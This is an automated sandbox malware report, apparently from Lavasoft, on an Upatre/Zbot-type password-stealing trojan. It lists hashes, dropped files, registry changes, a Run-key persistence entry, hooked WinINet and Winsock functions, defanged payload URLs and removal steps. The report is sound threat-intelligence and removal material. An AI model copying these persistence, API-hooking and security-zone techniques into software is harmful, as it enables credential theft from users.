Trojan.GenericKD.1588089 (BitDefender), TrojanDownloader:Win32/Upatre.O (Microsoft), Trojan.Win32.Bublik.caqm (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoad3.28161 (DrWeb), Trojan.GenericKD.1588089 (B) (Emsisoft), Artemis!6547C20E2CE1 (McAfee), Downloader (Symantec), Trojan.GenericKD.1588089 (FSecure), Generic10_c.AQZC (AVG), Win32:Malware-gen (Avast), Trojan.GenericKD.1588089 (AdAware), Trojan-PSW.Win32.Zbot.4.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 6547c20e2ce10eed3739af76becbae17
SHA1: d7f45d7f003ce9ca20a8f31004730be73f31a22c
SHA256: 771e93819c7edc041e078d81e24e17646fdf75c601ef9b5eaec0770668ee7619
SSDeep: 96:BPosVfXYEI3k8 rd2HGkRiDtrQ57fShKn9vwAl17q8d7ZH1YI2op:a4fXYEI3X rd0fiJY809YkvdVVRtp
Size: 6746 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: Setup
Created at: 2012-04-15 18:24:28
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users' passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan-PSW creates the following process(es):
driverquery.exe:2460
attrib.exe:1416
tasklist.exe:2360
dutit.exe:1116
systeminfo.exe:1756
makecab.exe:2920
butit.exe:1304
opera_autoupdater.exe:304
reg.exe:2656
The Trojan-PSW injects its code into the following process(es):
osuf.exe:604
Explorer.EXE:1212
File activity
The process driverquery.exe:2460 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_48.tmp (9348 bytes)
The process tasklist.exe:2360 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_48.tmp (3407 bytes)
The process dutit.exe:1116 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\OLT8457.bat (176 bytes)
%Documents and Settings%\%current user%\Application Data\Utfuak\osuf.exe (1138688 bytes)
%Documents and Settings%\%current user%\Application Data\Utfuak (4096 bytes)
The process osuf.exe:604 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\NTUSER.DAT (212992 bytes)
%System%\drivers\1a6c48.sys (63488 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (83456 bytes)
%Documents and Settings%\%current user% (28672 bytes)
The process systeminfo.exe:1756 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_48.tmp (2280 bytes)
The process makecab.exe:2920 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (14951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (14951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~49.tmp (15946 bytes)
The Trojan-PSW deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab7 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab8 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab10 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab11 (0 bytes)
The process butit.exe:1304 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%WinDir%\zlib1.dll (59904 bytes)
%WinDir%\aplib64.dll (12800 bytes)
%WinDir%\client.dll (227840 bytes)
%WinDir%\aplib.dll (11264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1715578.cmd (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FK4PQQEZ\desktop.ini (67 bytes)
The Trojan-PSW deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_48.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FK4PQQEZ\data[1].0&type=8 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~49.tmp (0 bytes)
The process opera_autoupdater.exe:304 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SG2624E3\27UKp[1].fb2 (731883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dutit.exe (831488 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RTEJ67TP\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\butit.exe (591872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RTEJ67TP\Test[1].fb2 (256674 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SG2624E3\desktop.ini (67 bytes)
The process reg.exe:2656 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_48.tmp (26430 bytes)
Registry activity
The process driverquery.exe:2460 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC 11 6D 63 58 83 38 55 71 69 8C C9 02 FE 07 44"
The process attrib.exe:1416 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A C7 49 BF 19 C6 9B 21 83 4E 77 E3 8D 11 34 8C"
The process tasklist.exe:2360 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 75 80 3F 82 39 D1 37 D7 E3 06 15 AC 4C 8E 3D"
The process dutit.exe:1116 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 31 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 B6 36 6C 56 29 7B 38 2F 5E 90 47 33 BE 7A 9D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process osuf.exe:604 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Yhizteeqw]
"1c4289d" = "nZFcca11kkpFfg==("
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 32 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB C0 AB 0B D6 2D EA A1 4D 09 72 D5 C9 FB C1 D7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process systeminfo.exe:1756 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 A2 D9 84 57 96 DB 9A 69 17 DE 07 1E E2 12 D5"
The process makecab.exe:2920 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 23 8D 1B 30 2F CE 84 89 27 3D 53 69 0F 0F 4C"
The process butit.exe:1304 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 30 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B D0 F8 10 88 5F 44 74 12 AC B4 F3 32 57 15 9C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan-PSW adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"relokmgr" = "rundll32 %WinDir%\client.dll,CreateProcessNotify"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process opera_autoupdater.exe:304 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Документы"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Мои документы"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Рабочий стол"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Рабочий стол"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp]
"dutit.exe" = "dutit"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp]
"butit.exe" = "butit"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 1F 8B FB 1D 81 9D 9F 9B EF 2C D5 87 CE 66 75"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process reg.exe:2656 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 DF A6 E0 85 26 62 45 F4 4C 28 42 98 E2 23 D4"
Dropped PE files
MD5 | File path |
---|---|
7db604c446cb21b06b7673a9206914be | c:\Documents and Settings\test\Local Settings\Temp\opera_autoupdater.exe |
7fe2b0b3fc2078130f20070a05daf8d5 | c:\WINDOWS\aplib.dll |
3f4fe60b6d1e05144f6efa098ac381a8 | c:\WINDOWS\aplib64.dll |
01c1e3ab46762ef23eb2ac898ea84c2c | c:\WINDOWS\client.dll |
80e41408f6d641dc1c0f5353a0cc8125 | c:\WINDOWS\zlib1.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "UNKNOWN" the Trojan-PSW controls the loading of executable images into memory by installing a load-image notifier.
Using the driver "UNKNOWN" the Trojan-PSW controls operations on the system registry by installing a registry notifier.
The Trojan-PSW installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFile
InternetWriteFileExA
InternetQueryDataAvailable
HttpQueryInfoW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
The Trojan-PSW installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan-PSW installs the following user-mode hooks in USER32.dll:
GetClipboardData
TranslateMessage
The Trojan-PSW installs the following user-mode hooks in Secur32.dll:
DecryptMessage
SealMessage
DeleteSecurityContext
The Trojan-PSW installs the following user-mode hooks in WS2_32.dll:
WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW
The Trojan-PSW installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtCreateThread
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
driverquery.exe:2460
attrib.exe:1416
tasklist.exe:2360
dutit.exe:1116
systeminfo.exe:1756
makecab.exe:2920
butit.exe:1304
opera_autoupdater.exe:304
reg.exe:2656
- Delete the original Trojan-PSW file.
- Delete or disinfect the following files created/modified by the Trojan-PSW:
%Documents and Settings%\%current user%\Local Settings\Temp\_48.tmp (9348 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OLT8457.bat (176 bytes)
%Documents and Settings%\%current user%\Application Data\Utfuak\osuf.exe (1138688 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (212992 bytes)
%System%\drivers\1a6c48.sys (63488 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (83456 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (14951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (14951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~49.tmp (15946 bytes)
%WinDir%\zlib1.dll (59904 bytes)
%WinDir%\aplib64.dll (12800 bytes)
%WinDir%\client.dll (227840 bytes)
%WinDir%\aplib.dll (11264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1715578.cmd (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FK4PQQEZ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SG2624E3\27UKp[1].fb2 (731883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dutit.exe (831488 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RTEJ67TP\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\butit.exe (591872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RTEJ67TP\Test[1].fb2 (256674 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SG2624E3\desktop.ini (67 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"relokmgr" = "rundll32 %WinDir%\client.dll,CreateProcessNotify"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 1259 | 1536 | 3.48941 | ea4a11f8ff9ed99ebc87aff02102a621 |
.data | 8192 | 3146 | 3584 | 4.65409 | 6603bf6b43b300ad9e541effbd07fd89 |
.rsrc | 12288 | 16 | 512 | 0 | bf619eac0cdf3f68d496ea9344137e8b |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
cc998eb5c7a0a416fd3cc61ce28ce6a8
Network Activity
URLs
URL | IP |
---|---|
hxxp://elwoodcinemas.com/wp-content/uploads/2014/02/Test.fb2 | 173.220.29.2 |
hxxp://elwoodcinemas.com/header/27UKp.fb2 | |
